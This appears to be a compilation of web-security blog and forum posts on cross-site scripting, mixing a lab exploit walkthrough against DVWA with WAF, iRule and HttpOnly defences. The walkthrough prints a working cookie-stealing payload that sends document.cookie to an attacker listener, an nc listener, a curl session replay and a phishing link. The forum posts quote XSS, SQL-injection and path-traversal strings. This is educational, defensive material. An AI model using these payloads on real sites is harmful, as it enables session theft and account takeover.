Cross Site Scripting (XSS) Exploit Paths
Introduction

Web application threats continue to cause serious security issues for large corporations and small businesses alike. In 2016, even the smallest, local family businesses have a Web presence, and it is important to understand the potential attack surface in any web-facing asset in order to properly understand vulnerabilities, exploitability, and thus risk. The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to ensuring the safety and security of web application software, and periodically releases a Top 10 list of common categories of web application security flaws. The current list is available at https://www.owasp.org/index.php/Top_10_2013-Top_10 (an updated list for 2016/2017 is currently in data call announcement), and is used by application developers, security professionals, software vendors and IT managers as a reference point for understanding the nature of web application security vulnerabilities. This article presents a detailed analysis of the OWASP security flaw A3: Cross-Site Scripting (XSS), including descriptions of the three broad types of XSS and possibilities for exploitation.

Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of web application injection attack in which malicious script is delivered to a client browser using the vulnerable web app as an intermediary. The general effect is that the client browser is tricked into performing actions not intended by the web application. The classic example of an XSS attack is to force the victim browser to throw an 'XSS!' or 'Alert!' popup, but actual exploitation can result in the theft of cookies or confidential data, download of malware, etc.

Persistent XSS

Persistent (or Stored) XSS refers to a condition where the malicious script can be stored persistently on the vulnerable system, such as in the form of a message board post. Any victim browsing the page containing the XSS script is an exploit target.
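The classic popup proof of concept only works because the application echoes user input into the page without output encoding. As a hedged illustration (not tied to any particular message board), Python's standard html.escape shows how encoding on output renders the same payload inert:

```python
from html import escape

# A classic stored-XSS proof-of-concept payload, as it might be
# submitted in a message board post.
payload = "<script>alert('XSS!')</script>"

# Rendered raw, the browser executes it. HTML-encoded, it is
# displayed as harmless text instead.
encoded = escape(payload, quote=True)
print(encoded)  # &lt;script&gt;alert(&#x27;XSS!&#x27;)&lt;/script&gt;
```

The same principle, applied in whatever templating layer the application uses, is the root fix for stored XSS.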
This is a very serious vulnerability, as a public stored XSS vulnerability could result in many thousands of cookies stolen, drive-by malware downloads, etc. As a proof of concept for cookie theft on a simple message board application, consider the following:

Here is our freshly-installed message board application. Users can post comments, admins can access the admin panel. Let's use the typical POC exercise to validate that the message board is vulnerable to XSS:

Sure enough, it is. Just throwing a dialog box is kinda boring, so let's do something more interesting. I'm going to inject a persistent XSS script that will steal the cookies of anyone browsing the vulnerable page:

Now I start a listener on my attacking box. This can be as simple as netcat, but it can be any webserver of your choosing (Python SimpleHTTPServer is another nice option).

dsyme@kylie:~$ sudo nc -nvlp 81

And wait for someone – hopefully the site admin – to browse the page. The admin has logged in and browsed the page. Now, my listener catches the HTTP callout from my malicious script:

And I have my stolen cookie: PHPSESSID=lrft6d834uqtflqtqh5l56a5m4. Now I can use an intercepting proxy or cookie manager to impersonate the admin. Using Burp:

Or, using Cookie Manager for Firefox:

Now I'm logged into the admin page. Access to a web application CMS is pretty close to pwn. From here I can persist my access by creating additional admin accounts (noisy), or upload a shell (web/php reverse) to get shell access to the victim server. Bear in mind that using such techniques we could easily host malware on our webserver, and every victim visiting the page with stored XSS would get a drive-by download.

Non-Persistent XSS

Non-persistent (or reflected) XSS refers to a slightly different condition in which the malicious content (script) is immediately returned by a web application, be it through an error message, search result, or some other means that echoes some part of the request back to the client.
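The listener's only job is to record the query string of the callout the injected script generates (document.location='http://attacker:81/?'+document.cookie). A minimal sketch of what the listener sees and how the cookie is recovered – using only the Python standard library, with the session ID from this walkthrough:

```python
from urllib.parse import urlsplit, parse_qsl

# First line of the HTTP request the victim's browser sends to the
# attacker's listener once the injected script fires.
request_line = "GET /?PHPSESSID=lrft6d834uqtflqtqh5l56a5m4 HTTP/1.1"

path = request_line.split(" ")[1]             # "/?PHPSESSID=..."
query = urlsplit(path).query                  # "PHPSESSID=..."
stolen = dict(parse_qsl(query, keep_blank_values=True))
print(stolen)  # {'PHPSESSID': 'lrft6d834uqtflqtqh5l56a5m4'}
```

With netcat the raw request line is simply printed to the terminal; a scripted listener like this would let an attacker harvest many cookies automatically.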
Due to their non-persistent nature, the malicious code is not stored on the vulnerable webserver, and hence it is generally necessary to trick a victim into opening a malicious link in order to exploit a reflected XSS vulnerability. We'll use our good friend DVWA (Damn Vulnerable Web App) for this example. First, we'll validate that it is indeed vulnerable to a reflected XSS attack:

It is. Note that this can be POC'd by using the web form, or by directly inserting code into the 'name' parameter in the URL. Let's make sure we can capture a cookie in a similar manner as before. Start a netcat listener on 192.168.178.136:81 (and yes, we could use a full-featured webserver for this to harvest many cookies), and inject the following into the 'name' parameter:

<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT>

We have a cookie: PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2. Let's see if we can use it to log in from the command line without using a browser:

$ curl -b "security=low;PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2" --location "http://192.168.178.140/dvwa/" > login.html
$ egrep Username login.html
<div align="left"><em>Username:</em> admin<br /><em>Security Level:</em> low<br /><em>PHPIDS:</em> disabled</div>

Indeed we can. Now, of course, we just stole our own cookie here. In a real attack we'd want to steal the cookie of the actual site admin, and to do that, we'd need to trick him or her into clicking the following link:

http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name=victim<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT>

Or, easily enough, to put it into an HTML message like this. And now we need to get our victim to click the link. A spear phishing attack might be a good way. And again, we start our listener and wait.
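In practice an attacker would percent-encode the payload before mailing the link, both so it survives transport and so it looks less obviously malicious. A hedged sketch of building the encoded link with the standard library (the IPs and path are the ones from this DVWA walkthrough):

```python
from urllib.parse import quote

payload = ("<SCRIPT>document.location="
           "'http://192.168.178.136:81/?'+document.cookie</SCRIPT>")

# Percent-encode the payload for placement in the 'name' query
# parameter; safe="" forces encoding of every reserved character.
link = ("http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name="
        + quote(payload, safe=""))
print(link)
```

DVWA (at the "low" security level) decodes the parameter server-side and reflects the script back to whichever browser follows the link.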
Of course, instead of stealing the admin's cookies, we could host malware on a webserver somewhere, distribute the malicious URL by phishing campaign, host it on a compromised website, or distribute it through adware (there are many possibilities), and wait for drive-by downloads. The malicious links are often obfuscated using a URL-shortening service.

DOM-Based XSS

DOM-based XSS is an XSS attack in which the malicious payload is executed as a result of modification of the Document Object Model (DOM) environment of the victim browser. A key differentiator between DOM-based and traditional XSS attacks is that in DOM-based attacks the malicious code is not sent in the HTTP response from server to client. In some cases, suspicious activity may be detected in HTTP requests, but in many cases no malicious content is ever sent to or from the webserver. Usually, a DOM-based XSS vulnerability is introduced by poor input validation in a client-side script. A very nice demo of DOM-based XSS is presented at https://xss-doc.appspot.com/demo/3. Here, the URL fragment (the portion of the URL after #, which is never sent to the server) serves as input to a client-side script – in this instance, telling the browser which tab to display:

Unfortunately, the URL fragment data is passed to the client-side script in an unsafe fashion. Viewing the source of the above webpage, line 8 shows the following function definition:

And line 33:

In this case we can pass a string to the URL fragment that we know will cause the function to error, e.g. "foo", and set an error condition. Reproducing the example from the above URL with full credit to the author, it is possible to inject code into the error condition, causing an alert dialog:

Which could be modified in a similar fashion to steal cookies etc.
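The underlying defect is that fragment input reaches the page logic without validation. A hedged sketch of the fix, with the client-side idea expressed in Python for brevity (the function name and tab count are illustrative, not taken from the demo's actual source): treat the fragment as untrusted, accept only the handful of values you expect, and fall back to a default for everything else.

```python
# Illustrative validation logic: the fragment should name one of a
# small set of known tabs; anything else is rejected rather than
# echoed into the DOM or used to build an error message.
VALID_TABS = {"0", "1", "2", "3"}

def select_tab(fragment: str) -> int:
    """Return a safe tab index; fall back to 0 for unexpected input."""
    return int(fragment) if fragment in VALID_TABS else 0

print(select_tab("2"))                             # 2
print(select_tab("<img src=x onerror=alert(1)>"))  # 0
```

Whitelisting like this also removes the "inject code into the error condition" vector, because attacker-controlled input never reaches the error path at all.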
And of course we could deface the site by injecting an image of our choosing from an external source:

There are other possible vectors for DOM-based XSS attacks, such as:

- Unsanitized URL or POST body parameters that are passed to the server but do not modify the HTTP response, yet are stored in the DOM to be used as input to the client-side script. An example is given at https://www.owasp.org/index.php/DOM_Based_XSS
- Interception of the HTTP response to include additional malicious scripts (or modify existing scripts) for the client browser to execute. This could be done with a Man-in-the-Browser attack (malicious browser extensions), malware, or response-side interception using a web proxy.

Like reflected XSS, exploitation is often accomplished by fooling a user into clicking a malicious link. DOM-based XSS is typically a client-side attack. The only circumstance under which server-side web-based defences (such as mod_security, IDS/IPS or WAF) are able to prevent DOM-based XSS is if the malicious script is sent from client to server, which is not usually the case for DOM-based XSS. As many more web applications utilize client-side components (such as sending periodic AJAX calls for updates), DOM-based XSS vulnerabilities are on the increase – an estimated 10% of the Alexa top 10k domains contained DOM-based XSS vulnerabilities, according to Ben Stock, Sebastian Lekies and Martin Johns (https://www.blackhat.com/docs/asia-15/materials/asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm).pdf).

Preventing XSS

XSS vulnerabilities exist due to a lack of input validation, whether on the client or server side. Secure coding practices, regular code review, and white-box penetration testing are the best ways to prevent XSS in a web application, by tackling the problem at source. OWASP has a detailed list of rules for XSS prevention documented at https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet.
There are many other resources online on the topic. However, for many (most?) businesses, it may not be possible to conduct code reviews or commit development effort to fixing vulnerabilities identified in penetration tests. In most cases, XSS can be easily prevented by the deployment of Web Application Firewalls. Typical mechanisms for XSS prevention with a WAF are:

- Alerting on known XSS attack signatures
- Prevention of input of <script> tags to the application unless specifically allowed (rare)
- Prevention of input of < and > characters in web forms
- Multiple URL decoding to prevent bypass attempts using encoding
- Enforcement of value types in HTTP parameters
- Blocking non-alphanumeric characters where they are not permitted

Typical IPS appliances lack the HTTP intelligence to be able to provide the same level of protection as a WAF. For example, while an IPS may block the <script> tag (if it is correctly configured to intercept SSL), it may not be able to handle the URL decoding required to catch obfuscated attacks. F5 Silverline is a cloud-based WAF solution and provides native and quick protection against XSS attacks. This can be an excellent solution for deployed production applications that include XSS vulnerabilities, because modifying the application code to remove the vulnerability can be time-consuming and resource-intensive. Full details of blocked attacks (true positives) can be viewed in the Silverline portal, enabling application and network administrators to extract key data in order to profile attackers:

Similarly, time-based histograms can be displayed providing details of blocked XSS campaigns over time. Here, we can see that a serious XSS attack was prevented by Silverline WAF on September 1st:

F5 Application Security Manager (ASM) can provide a similar level of protection in an on-premise capacity.
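The "multiple URL decoding" item deserves a quick illustration: attackers double-encode payloads so that a single decode pass still looks harmless. A hedged sketch of the idea (an illustration of the technique, not any vendor's actual implementation) is to decode repeatedly until the string stabilizes before matching signatures:

```python
from urllib.parse import unquote

def full_decode(value: str, max_rounds: int = 5) -> str:
    """Repeatedly percent-decode until the value stops changing."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

# Double-encoded <script> slips past a single-pass decoder.
double_encoded = "%253Cscript%253E"
print(unquote(double_encoded))      # %3Cscript%3E  (still looks harmless)
print(full_decode(double_encoded))  # <script>      (caught by signatures)
```

The round limit matters: an unbounded decode loop is itself a resource-exhaustion target.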
It is of course highly recommended that any preventive controls be tested – which typically means running an automated vulnerability scan (good) or manual penetration test (better) against the application once the control is in place. As noted in the previous section, do not expect web-based defences such as a WAF to protect against DOM-based XSS, as most attack vectors do not actually send any malicious traffic to the server.

Stop Those XSS Cookie Bandits iRule Style
In a recent post, CodingHorror blogged about a story of one of his friend's attempts at writing his own HTML sanitizer for his website. I won't bother repeating the details, but it all boils down to the fact that his friend noticed users were logged into his website as him and hacking away with admin access. How did this happen? It turned out to be a Cross Site Scripting attack (XSS) that found its way around his HTML sanitizing routines. A user posted some content that included mangled JavaScript that made an external reference, sending all history and cookies of the current user's session to an alternate machine. CodingHorror recommended adding the HttpOnly attribute to Set-Cookie response headers to help protect these cookies from being able to make their way out to remote machines. Per his blog post:

- HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
- HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
- XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.

Whenever I hear about modifications made to backend servers, alarms start going off in my head and I get to thinking about how this can be accomplished on the network transparently. Well, if you happen to have a BIG-IP, then it's quite easy. A simple iRule can be constructed that will check all the response cookies and, if they do not already have the HttpOnly attribute, add it. I went one step further and added a check for the "Secure" attribute and added that one in as well for good measure.

when HTTP_RESPONSE {
  foreach cookie [HTTP::cookie names] {
    set value [HTTP::cookie value $cookie];
    if { "" != $value } {
      set testvalue [string tolower $value]
      set valuelen [string length $value]
      #log local0. "Cookie found: $cookie = $value";
      switch -glob $testvalue {
        "*;secure*" -
        "*; secure*" { }
        default { set value "$value; Secure"; }
      }
      switch -glob $testvalue {
        "*;httponly*" -
        "*; httponly*" { }
        default { set value "$value; HttpOnly"; }
      }
      if { [string length $value] > $valuelen } {
        #log local0. "Replacing cookie $cookie with $value"
        HTTP::cookie value $cookie "${value}"
      }
    }
  }
}

If you are only concerned with the Secure attribute, then you can always use the "HTTP::cookie secure" command, but as far as I can tell it won't include the HttpOnly attribute. So, if you determine that HttpOnly cookies are the way you want to go, you could manually configure these on all of your applications on your backend servers. Or... you could configure it in one place on the network. I think I prefer the second option.

-Joe

WAF Attack Signature Level
Hi, I have a specific URL defined in the ASM Allowed URLs ("/path01/page.aspx" for our example), which has "Check attack signatures" checked. In the Parameters we have only Wildcard with Ignore Value set. We found this malicious attempt request wasn't detected:

/path01/page.aspx?a=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&b=UNION+SELECT+ALL+FROM+information_schema+AND+%27+or+SLEEP%285%29+or+%27&c=..%2F..%2F..%2F..%2Fetc%2Fpasswd

which decodes to this:

/path01/page.aspx?a=<script>alert("XSS");</script>&b=UNION SELECT ALL FROM information_schema AND ' or SLEEP(5) or '&c=../../../../etc/passwd

So I understand the malicious code is in the parameter context, so it's not checked due to the wildcard settings. But on the other hand, under the specific URL context, there are several "XSS (parameters)" signatures enabled. Doesn't that mean that under that specific URL it should check parameters against those XSS signatures? Thanks

Lightboard Lessons: OWASP Top 10 - Cross Site Scripting
The OWASP Top 10 is a list of the most common security risks on the Internet today. Cross Site Scripting (XSS) comes in at the #7 spot in the latest edition of the OWASP Top 10. In this video, John discusses how Cross Site Scripting works and outlines some mitigation steps to make sure your web application stays secure against this threat. Related Resources: Securing against the OWASP Top 10: Cross-Site Scripting

ASM don't block XSS
hi all, why doesn't the ASM block this:

"</script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>"><script>alert(150)</script>&arguments=-N2019,-A,-N325,-N0"

All the XSS signatures are enabled, and I see in the security logs that there are some XSS attacks that get blocked.

viewing full request on ASM Reporting
Hi, Is there a way to get the full request in ASM Reporting? SOL12044 says the default behavior is that ASM truncates the request in ASM Reporting. https://support.f5.com/kb/en-us/solutions/public/12000/000/sol12044.html The reason I ask is that I am seeing traffic that matches a Cross Site Scripting signature, but it is not showing the violation details (e.g. matching string, etc). Thanks in advance for the assistance.

ASM Custom signature set behavior.
Hey Folks, Asking a query after a long time. I found a limitation with the ASM Custom Signature Set configuration, and I need your expert advice to confirm if my understanding is correct or not. We got a requirement from a customer to block all JavaScript-based XSS attacks. (They have an external pentesting team, who found that their application is vulnerable to XSS for every JavaScript event.) Using the default ASM signature set, it didn't seem to be working with JavaScript event-based XSS attacks; however, the rest of the attacks were being blocked. To achieve the customer's requirement, we designed a custom signature set containing 39 different signatures, one for each event (e.g. onChange, etc.), and put all the signatures into a single signature set in ASM. Surprisingly, only the first signature worked and the remaining 38 didn't. I took one signature from the list, configured another signature set, and put this signature into the new signature set. And it worked. This seems to mean that I must create an individual signature set for each individual signature, which I find tedious and time-consuming, prone to error, and an increase in administrative overhead. Could anyone please confirm if this is normal behavior? Is this a limitation of ASM? Thanks in advance, Darshan

The Lock May be Broken
A couple of weeks ago, a new security advisory was published: CVE-2012-0053, "Apache HttpOnly Cookie Disclosure". While the severity of this vulnerability is just "medium", there are some things that we can learn from it. As far as I see it, this vulnerability actually uses a more sophisticated approach in order to steal sensitive information. It suggests an exploit proof of concept that combines two attack methods:

1. A well-known application security vulnerability named "Cross-Site Scripting (XSS)".
2. A newly introduced vulnerability in Apache, where by sending a cookie HTTP header that is too long, the HttpOnly cookie value is returned by the web server in a "400 Bad Request" response page.

From the OWASP page on HttpOnly, "Mitigating the Most Common XSS attack using HttpOnly": "The majority of XSS attacks target theft of session cookies. A server could help mitigate this issue by setting the HTTPOnly flag on a cookie it creates, indicating the cookie should not be accessible on the client. If a browser that supports HttpOnly detects a cookie containing the HttpOnly flag, and client side script code attempts to read the cookie, the browser returns an empty string as the result. This causes the attack to fail by preventing the malicious (usually XSS) code from sending the data to an attacker's website."

So the HttpOnly cookie that is not supposed to be accessed by JavaScript on the client browser can be accessed when exploiting this vulnerability. In other words, the lock may be broken, and the mechanism that is supposed to prevent an attack can, in some circumstances, be bypassed. This leads me to say that while security countermeasures are becoming more and more sophisticated over the years, security vulnerabilities and their exploits are becoming more and more elusive.
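Setting the flag itself is trivial on most platforms. As a hedged, framework-agnostic sketch using only the Python standard library (the session value is the one from the earlier walkthrough), this is what a Set-Cookie header carrying both protective flags looks like:

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["PHPSESSID"] = "ikm95nv7u7dlihhlkjirehbiu2"
cookie["PHPSESSID"]["httponly"] = True   # block document.cookie access
cookie["PHPSESSID"]["secure"] = True     # only send over HTTPS

header = cookie.output(header="Set-Cookie:")
print(header)  # Set-Cookie: PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2; HttpOnly; Secure
```

As the advisory shows, HttpOnly raises the bar but is not absolute; it should be layered with the other mitigations below rather than relied on alone.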
Web Application Firewalls were designed from the beginning to solve such zero-day vulnerabilities, presenting multi-layered protection for the web application by combining signature-based protection, HTTP protocol constraints, and web application behavioral anomaly protection. From the BIG-IP Application Security Manager perspective, this vulnerability can be easily mitigated by performing the following:

i. Using Cross-Site Scripting signatures in order to mitigate Cross-Site Scripting vulnerabilities.
ii. Applying a security policy that limits the header's length.
iii. Creating a custom error page for when this violation occurs.

F5 Friday: Eliminating the Blind Spot in Your Data Center Security Strategy
Pop Quiz: In recent weeks, which of the following attack vectors have been successfully used to breach major corporation security? (choose all that apply)

- Phishing
- Parameter tampering
- SQL Injection
- DDoS
- SlowLoris
- Data leakage

If you selected them all, give yourself a cookie because you're absolutely right. All six of these attacks have successfully been used recently, resulting in breaches across the globe: the International Monetary Fund, the US Government (Senate), the CIA, Citibank, the Malaysian government, Sony, and the Brazilian government and Petrobras, the latest LulzSec victims.

That's no surprise; attacks are ongoing, constantly. They are relentless. Many of them are mass attacks with no specific target in mind; others are more subtle, planned, and designed to do serious damage to the victim. Regardless, these breaches all have one thing in common: the breach was preventable. At issue is the reality that attackers today have moved up the stack and are attacking in the data center's security blind spot: the application layer. Gone are the days of blasting the walls of the data center with packets to take out a site. Data center interconnects have expanded to the point that it's nearly impossible to disrupt network infrastructure and cause an outage without a highly concerted and distributed effort. It does happen, but it's more frequently the case that attackers are moving to highly targeted, layer 7 attacks that are far more successful, using far fewer resources, with a much smaller chance of being discovered. The security-oriented infrastructure traditionally relied upon to alert on attacks is blind, unable to detect layer 7 attacks because they don't appear to be attacks. They look just like "normal" users. The most recent attack, against www.cia.gov, does not appear to be particularly sophisticated. LulzSec described that attack as a simple packet flood, which overwhelms a server with volume.
Analysts at F5, which focuses on application security and availability, speculated that it actually was a Slowloris attack, a low-bandwidth technique that ties up server connections by sending partial requests that are never completed. Such an attack can come in under the radar because of the low volume of traffic it generates and because it targets the application layer, Layer 7 in the OSI model, rather than the network layer, Layer 3. [emphasis added]

-- Ongoing storm of cyberattacks is preventable, experts say

It isn't the case that organizations don't have a sound security strategy and matching implementation; it's that the strategy has a blind spot at the application layer. In fact, it's been the evolution of network and transport layer security success that's almost certainly driven attackers to climb higher up the stack in search of new and unanticipated (and often unprotected) avenues of opportunity.

ELIMINATING the BLIND SPOT

Too often organizations – and specifically developers – hear the words "layer 7" anything and immediately take umbrage at the implication they are failing to address application security. In many situations it is the application that is vulnerable, but far more often it's not the application – it's the application platform or protocols that are the source of contention, neither of which a developer has any real control over. Attacks designed specifically to leech off resources – SlowLoris, DDoS, HTTP floods – simply cannot be noticed or prevented by the application itself. Neither are these attacks noticed or prevented by most security infrastructure components, because they do not appear to be attacks. In cases where protocol (HTTP) exploitation is leveraged, it is not possible to detect such an attack unless the right information is available in the right place at the right time. The right place is a strategic point of control. The right time is when the attack begins.
The right information is a combination of variables: the context carried with every request that imparts information about the client, network, and server-side status. If a component can see that a particular user is sending data at a rate much slower than their network connection should allow, that tells the component it's probably an application layer attack, which then triggers organizational policies regarding how to deal with such an attack: reject the connection, shield the application, notify an administrator. Only a component that is positioned properly in the data center, i.e. in a strategic point of control, can properly see all the variables and make such a determination. Only a component that is designed specifically to intercept, inspect and act on data across the entire network and application stack can detect and prevent such attacks from being successfully carried out.

BIG-IP is uniquely positioned – topologically and technologically – to address exactly these kinds of multi-layer attacks. Whether the strategy to redress such attacks is "Inspect and Reject" or "Buffer and Wait", the implementation using BIG-IP simply makes sense. Because of its position in the network – in front of applications, between clients and servers – BIG-IP has the visibility into both internal and external variables necessary. With its ability to intercept, inspect and then act upon the variables extracted, BIG-IP is perfectly suited to detecting and preventing attacks that normally wind up in most infrastructure's blind spot. This trend is likely to continue, and it's also likely that additional "blind spots" will appear as consumerization via tablets and mobile devices continues to drive new platforms and protocols into the data center. Preventing attacks from breaching security and claiming victory – whether the intent is to embarrass or to profit – is the goal of a comprehensive organizational security strategy. That requires a comprehensive, i.e.
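The "data rate much slower than the connection should allow" heuristic can be sketched very simply. This is an illustrative model only – the function name, threshold, and numbers are made up for the sketch, not BIG-IP's actual logic: flag any request whose observed transfer rate is a tiny fraction of what the client's link supports.

```python
def looks_like_slow_attack(bytes_received: int,
                           elapsed_seconds: float,
                           link_bytes_per_sec: float,
                           suspicion_ratio: float = 0.01) -> bool:
    """Flag requests trickling in far below the client's link capacity.

    A Slowloris-style client deliberately sends a few bytes at a time,
    so its observed rate is a tiny fraction of what the link allows.
    """
    observed_rate = bytes_received / max(elapsed_seconds, 1e-9)
    return observed_rate < link_bytes_per_sec * suspicion_ratio

# A client on a ~1 MB/s link that has sent 200 bytes in 30 seconds:
print(looks_like_slow_attack(200, 30.0, 1_000_000))      # True
# A normal client that sent 500 KB in the same window:
print(looks_like_slow_attack(500_000, 30.0, 1_000_000))  # False
```

The hard part in practice is not the arithmetic but having a vantage point that can observe both the request stream and the client's network characteristics at once, which is the "strategic point of control" argument above.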
multi-layer, security architecture and implementation, one without any blind spots in which an attacker can sneak up on you and penetrate your defenses. It's time to evaluate your security strategy and systems with an eye toward whether such blind spots exist in your data center. And if they do, it's well past time to do something about it.

More Info on Attack Prevention on DevCentral:
- DevCentral Security Forums
- DDoS Attack Protection in BIG-IP Local Traffic Manager
- DDoS Attack Protection in BIG-IP Application Security Manager

F5 Friday: Expected Behavior is not Necessarily Acceptable Behavior
Sometimes vulnerabilities are simply the result of a protocol design decision, but that doesn't make it any less a vulnerability.

An article discussing a new attack on social networking applications that effectively provides an opening through which personal data can be leaked was passed around the Internets recently. If you haven't read "Abusing HTTP Status Codes to Expose Private Information" yet, please do; it's a good read and exposes, if you'll pardon the pun, yet another "vulnerability by design" flaw that exists in many of the protocols that make the web go today. We, as an industry, spend a lot of time picking on developers for not writing secure code, for introducing vulnerabilities and subsequently ignoring them, and for basically making the web a very scary place. We rarely, however, talk about the insecurities and flaws inherent in core protocols that contribute to the overall scariness of the Internets. Consider, for example, the misuse and abuse of HTTP as a means to carry out a DDoS attack. Such attacks are not viable due to some developer with a lax attitude toward security; they're simply the result of the way in which the protocol works. Someone discovered a way to put it to work to carry out their evil plans. The same can be said of the aforementioned "vulnerability." This isn't the result of developers not caring about security; it's merely a side effect of the way in which HTTP is supposed to work. Site and application developers use HTTP status codes and the like to respond to requests in addition to the content returned. Some of those HTTP status codes aren't even under the control of the site or application developer – 5xx errors are returned by the web or application server software automatically based on internal conditions. That someone has found a way to leverage these basic behaviors in a way that might allow personal information to be exposed should be no surprise.
The more complex web applications – and the interactions that make the "web" an actual "web" of interconnected sites and data stores – become, the more innovative use of admittedly very basic application protocols must be made. That innovation can almost always be turned around and used for more malevolent purposes. What was troubling, however, was Google's response to this "vulnerability" in Gmail as described by the author. The author states he "reported it to Google and they described it as 'expected behaviour' and ignored it." Now Google is right – it is expected behavior, but that doesn't necessarily mean it's acceptable behavior.

PROTECTING YOURSELF from BAD EXPECTED BEHAVIOR

Enabling protection against this potential exposure of personal information depends on whether you are a user or someone charged with protecting users' information. If you didn't read through all the comments on the article, then you missed a great suggestion for users interested in protecting themselves against what is similar to a cross-site request forgery (XSRF) attack. I'll reproduce it here, in total, to make sure nothing is lost:

Justin Samuel: I'm the RequestPolicy developer. Thanks for the mention. I should point out that if you're using NoScript then you're already safe as long as you haven't allowed JavaScript on this or the other sites. Of course, people do allow JavaScript in some cases but still want control over cross-site requests. In those cases, NoScript + RequestPolicy is a great combo (it's what I use) if the usability impact of having two website-breaking, whitelist-based extensions installed is worth the security and privacy gains. RequestPolicy does have some good usability improvements planned, but if you can only stand to have one of these extensions installed, then I recommend NoScript over RequestPolicy in most situations.
Written Tuesday, January the 25th, 2011

So as a user, NoScript, or NoScript plus RequestPolicy, will help keep you safe from the potential misuse of this "expected behavior" by giving you the means by which you can control cross-site requests. As someone responsible for protecting your user/customer/partner/employee information, however, you can't necessarily force the use of NoScript or RequestPolicy or any other client-side solution. First, it doesn't protect the data from leaving the building in the first place, and second, even if it did and you could force the installation/deployment of such solutions, you can't necessarily control user behavior that may lead to turning it off or otherwise manipulating the environment. The reality is that for organizations trying to protect both themselves and their customers, they have only one thing they can control: their own environment. That means the data center.

PROTECTING YOUR CLIENTS FROM BAD EXPECTED BEHAVIOR

To prevent data leakage of any kind – whether through behavioral or vulnerability exploitation – you need a holistic security strategy in place. The funny thing about protocol behavior exploitation, however, is that application protocol behavior is governed by the stack and the platform, not necessarily the application itself. Now in this case it's true that the behavior is eerily similar to a cross-site request forgery (XSRF) attack, which means developers could and probably should be able to address it by enforcing policies that restrict access to specific requests based on referrer or other identifying – contextual – information. The problem is that this means modifying applications for a potential vulnerability that may or may not be exploited. It's unlikely to have the priority necessary to garner time and effort on the application development team's already lengthy to-do list. Which is where a web application firewall (WAF) like BIG-IP ASM (Application Security Manager) comes into play.
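The referrer-based policy described above can be sketched in a few lines. This is an illustrative example only: the helper name and trusted origin are assumptions for the sketch, not an ASM feature or any application's real API. The idea is to reject state-changing requests whose Referer header does not come from the site's own origin:

```python
from urllib.parse import urlsplit

TRUSTED_ORIGIN = ("https", "example.com")  # scheme and host we expect

def referer_allowed(referer_header: str) -> bool:
    """Accept a request only if its Referer matches our own origin."""
    if not referer_header:
        return False  # strict policy: a missing Referer is rejected
    parts = urlsplit(referer_header)
    return (parts.scheme, parts.hostname) == TRUSTED_ORIGIN

print(referer_allowed("https://example.com/account/settings"))  # True
print(referer_allowed("http://attacker.invalid/lure.html"))     # False
```

Referer checks are a weak control on their own (headers can be absent or stripped by proxies), which is part of why pushing this enforcement to a WAF, with token-based XSRF defenses behind it, is attractive.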
BIG-IP ASM can protect applications and sensitive data from attacks like XSRF right now. It doesn't take nearly the cycles to implement an XSRF (or other web application layer security) policy using ASM as it will to address it in the application itself (if that's even possible – sometimes it's not). Whether ASM or any WAF ends up permanently protecting data against exploitation or not is entirely up to the organization. In some cases it may be the most financially and architecturally efficient solution. In other cases it may not. In the former, hey, great. In the latter, hey, great – you've got a stop-gap measure to protect data, customers, and the organization until such time as a solution can be implemented, tested, and ultimately deployed. Either way, BIG-IP ASM enables organizations to quickly address expected (but still unacceptable) behavior. That means risk is nearly immediately mitigated, whether or not the long-term solution remains the WAF or falls to developers. Customers don't care about the political battles or religious wars that occur regarding the role of web application firewalls in the larger data center security strategy, and they really don't want to hear about "expected behavior" as the cause of a data leak. They care that they are protected, when using applications, against inadvertent theft of their private, personal data. It's the job of IT to do just that, one way or another.

- Facebook app pages serve up Javascript and Acai Berry spam
- The "True Security Company" Red Herring
- F5 Friday: Two Heads are Better Than One
- Challenging the Firewall Data Center Dogma
- F5 Friday: Multi-Layer Security for Multi-Layer Attacks
- F5 Friday: You'll Catch More Bees with Honey(pots)
- Defeating Attacks Easier Than Detecting Them
- 2011 Hactivism Report
- Security is Our Job
- F5 Networks Hacktivism Focus Group